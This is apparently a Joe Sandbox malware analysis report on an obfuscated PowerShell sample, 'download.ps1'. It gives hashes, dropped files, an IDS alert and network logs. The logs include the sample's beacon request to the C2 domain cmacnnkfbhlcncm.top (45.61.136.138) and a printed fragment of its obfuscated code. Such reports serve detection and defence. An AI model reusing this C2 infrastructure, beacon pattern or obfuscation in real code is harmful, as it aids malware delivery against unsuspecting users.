                                                                                                                        https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.2195883968.000001AE00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.2195883968.000001AE00FB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs
                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              172.217.19.228
                                                                                                                              www.google.comUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              45.61.136.138
                                                                                                                              cmacnnkfbhlcncm.topUnited States
                                                                                                                              40676AS40676USfalse
                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                              Analysis ID:1579000
                                                                                                                              Start date and time:2024-12-20 17:33:27 +01:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 4m 27s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:6
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:download.ps1
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal68.evad.winPS1@2/7@2/2
                                                                                                                              EGA Information:Failed
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 94%
                                                                                                                              • Number of executed functions: 15
                                                                                                                              • Number of non-executed functions: 3
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .ps1
                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4580 because it is empty
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                              • VT rate limit hit for: download.ps1
                                                                                                                              TimeTypeDescription
                                                                                                                              11:34:22API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/rz932vog4whtr.php?id=user-PC&key=63562548914&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/h5raxn90w1htr.php?id=user-PC&key=130484823816&s=527
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              AS40676USla.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 107.160.112.122
                                                                                                                              QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                              • 107.160.131.254
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 23.179.110.68
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):64
                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:NlllulbtI/llh:NllUGt
                                                                                                                              MD5:A2FA6893E23DC54E7B37910FF7A39E91
                                                                                                                              SHA1:28B1D6865C49F8F08051DFB8B855177064035480
                                                                                                                              SHA-256:1B6E4AD9FBE44E46DB569F77AB07069955CAF781A4644F8BB7FBFE9118262AC4
                                                                                                                              SHA-512:67DE29491B5837B5324D8AD6BA978992FEE7F08B42F37FF61371DD3D50FD792C03B24C6DFA82CAF3BB30ACE4119BA3CB17E9CA2E47F3F1BAFCAE9F57CE4DA6EA
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:@...e...................................-............@..........
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6222
                                                                                                                              Entropy (8bit):3.70549123808272
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:wTcs2CFbU2K+gsukvhkvklCywKn2kp6TtlzCSogZoxEp6Ttl4JCSogZoF1:8/2CWockvhkvCCtagTtlH9gTt2FHy
                                                                                                                              MD5:80EEAE5978AEA7C28B8048177E39053D
                                                                                                                              SHA1:B22EC04F09C2F528CD45BB3C51F9A89E422778D5
                                                                                                                              SHA-256:F786F61425728D9820505DAD77AC5B7024D197B30DF0DC7765976C9E08618315
                                                                                                                              SHA-512:DBFAEDC1A81BD072B53C4AF5DA4EC8694F8F38338B7142D36286E49FCC4C674F73741EF90C49B3672CC8019AB3E9A52C03D85AA30267F09D604639A4AC824E8D
                                                                                                                              Malicious:false
                                                                                                                              Preview:...................................FL..................F.".. ...d......W.&..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......f...R....0..R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.YD.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......YF...Roaming.@......DWSl.YF.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.YD.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl.YD.....E.....................:?..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.YD.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.YD.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.YJ.....q...........
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6222
                                                                                                                              Entropy (8bit):3.70549123808272
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:wTcs2CFbU2K+gsukvhkvklCywKn2kp6TtlzCSogZoxEp6Ttl4JCSogZoF1:8/2CWockvhkvCCtagTtlH9gTt2FHy
                                                                                                                              MD5:80EEAE5978AEA7C28B8048177E39053D
                                                                                                                              SHA1:B22EC04F09C2F528CD45BB3C51F9A89E422778D5
                                                                                                                              SHA-256:F786F61425728D9820505DAD77AC5B7024D197B30DF0DC7765976C9E08618315
                                                                                                                              SHA-512:DBFAEDC1A81BD072B53C4AF5DA4EC8694F8F38338B7142D36286E49FCC4C674F73741EF90C49B3672CC8019AB3E9A52C03D85AA30267F09D604639A4AC824E8D
                                                                                                                              Malicious:false
                                                                                                                              Preview:...................................FL..................F.".. ...d......W.&..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......f...R....0..R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.YD.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......YF...Roaming.@......DWSl.YF.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.YD.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl.YD.....E.....................:?..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.YD.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.YD.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.YJ.....q...........
                                                                                                                              File type:ASCII text, with very long lines (10634), with CRLF line terminators
                                                                                                                              Entropy (8bit):5.946888251796256
                                                                                                                              TrID:
                                                                                                                                File name:download.ps1
                                                                                                                                File size:20'668 bytes
                                                                                                                                MD5:15c696b54fec704854a06052972d8da1
                                                                                                                                SHA1:ed686be71d4fd74a17b80d566d6d2303704ead3f
                                                                                                                                SHA256:54b46f36f001fa7f35af7bd1deaa1b835a3145b18feb98f2584c08220c2dc988
                                                                                                                                SHA512:21bcebca8512824ff812cc7322ac63bef7fe54301df3bf5cf2e51abfbe84a0b4a5b4288e50afc25f39de0fec8d0ab6389e25f4883f2e54f42418e2fe43511d4e
                                                                                                                                SSDEEP:384:9ZzHKrpx6n9uIv1HfCSdd7RuylIkfHGhmPPOFD4nBK9+787LroYnlyXhMPI:/HyIdHfCSdRH5u0PMEnB+GOrpnkhMg
                                                                                                                                TLSH:5F927D967384E492C1CA963FA803BC057B56B57ED5E37EC8F2A6A6C273823407E44DD1
                                                                                                                                File Content Preview:$xbwidsplqrogk=$executioncontext;$isreisertionreonbeoran = ([ChAr[]]@((333-(-225+505)),(-6482+6534),(-9505+9562),(397650/7953),(514920/9195),(7353-7299),(-4080+(20353256/(-1086+(53618482/8926)))),(232155/4221),(4294-(33263433/7847)),(-4936+4986),(424592/7
                                                                                                                                Icon Hash:3270d6baae77db44
                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-12-20T17:34:26.290036+01002859391ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.2.5552171.1.1.153UDP
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 20, 2024 17:34:26.899077892 CET4970480192.168.2.545.61.136.138
                                                                                                                                Dec 20, 2024 17:34:27.018770933 CET804970445.61.136.138192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:27.018856049 CET4970480192.168.2.545.61.136.138
                                                                                                                                Dec 20, 2024 17:34:27.023941994 CET4970480192.168.2.545.61.136.138
                                                                                                                                Dec 20, 2024 17:34:27.143937111 CET804970445.61.136.138192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:28.365309000 CET804970445.61.136.138192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:28.420653105 CET4970480192.168.2.545.61.136.138
                                                                                                                                Dec 20, 2024 17:34:28.652470112 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:28.772524118 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:28.772674084 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:28.772919893 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:28.892450094 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.617027044 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.617055893 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.617075920 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.617094040 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.617114067 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.617177010 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.617230892 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.617408037 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.617424965 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.617455959 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.617459059 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.617476940 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.617501974 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.617958069 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.618016005 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.737891912 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.737946033 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.738117933 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.742008924 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.795700073 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.808998108 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.809153080 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.809256077 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.813049078 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.814336061 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.814393044 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.814393044 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.822702885 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.822926044 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.823867083 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.824027061 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.824075937 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.832283020 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.837430954 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.837455988 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.837513924 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.841837883 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.841942072 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.851037025 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.851119995 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.851175070 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.855123043 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.865150928 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.865237951 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.865243912 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.867654085 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.867706060 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.867738962 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.878318071 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.878423929 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.878462076 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.915543079 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.915585995 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.915683031 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.928989887 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.929014921 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.929109097 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:30.933161974 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:30.933268070 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:31.046217918 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.046261072 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.046329021 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:31.048451900 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.048540115 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.048592091 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:31.053241014 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.054860115 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.054981947 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:31.055016994 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.059580088 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.059644938 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:31.059664011 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.063122034 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.063191891 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.063209057 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:31.066833019 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.066942930 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.066951990 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:31.071161032 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.071202993 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.071240902 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:31.074093103 CET8049705172.217.19.228192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:31.074148893 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:31.395956039 CET4970580192.168.2.5172.217.19.228
                                                                                                                                Dec 20, 2024 17:34:31.396323919 CET4970480192.168.2.545.61.136.138
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 20, 2024 17:34:26.290035963 CET5521753192.168.2.51.1.1.1
                                                                                                                                Dec 20, 2024 17:34:26.718471050 CET53552171.1.1.1192.168.2.5
                                                                                                                                Dec 20, 2024 17:34:28.367185116 CET5322553192.168.2.51.1.1.1
                                                                                                                                Dec 20, 2024 17:34:28.506067991 CET53532251.1.1.1192.168.2.5
                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Dec 20, 2024 17:34:26.290035963 CET192.168.2.51.1.1.10xa479Standard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                                                                                                                Dec 20, 2024 17:34:28.367185116 CET192.168.2.51.1.1.10x134cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Dec 20, 2024 17:34:26.718471050 CET1.1.1.1192.168.2.50xa479No error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                                Dec 20, 2024 17:34:28.506067991 CET1.1.1.1192.168.2.50x134cNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                • cmacnnkfbhlcncm.top
                                                                                                                                • www.google.com
                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.54970445.61.136.138804580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 20, 2024 17:34:27.023941994 CET217OUTGET /5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527 HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                Host: cmacnnkfbhlcncm.top
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 20, 2024 17:34:28.365309000 CET166INHTTP/1.1 302 Found
                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                Date: Fri, 20 Dec 2024 16:34:28 GMT
                                                                                                                                Content-Length: 0
                                                                                                                                Connection: keep-alive
                                                                                                                                Location: http://www.google.com


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.549705172.217.19.228804580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 20, 2024 17:34:28.772919893 CET159OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                Host: www.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 20, 2024 17:34:30.617027044 CET1236INHTTP/1.1 200 OK
                                                                                                                                Date: Fri, 20 Dec 2024 16:34:30 GMT
                                                                                                                                Expires: -1
                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                Content-Type: text/html; charset=UTF-8
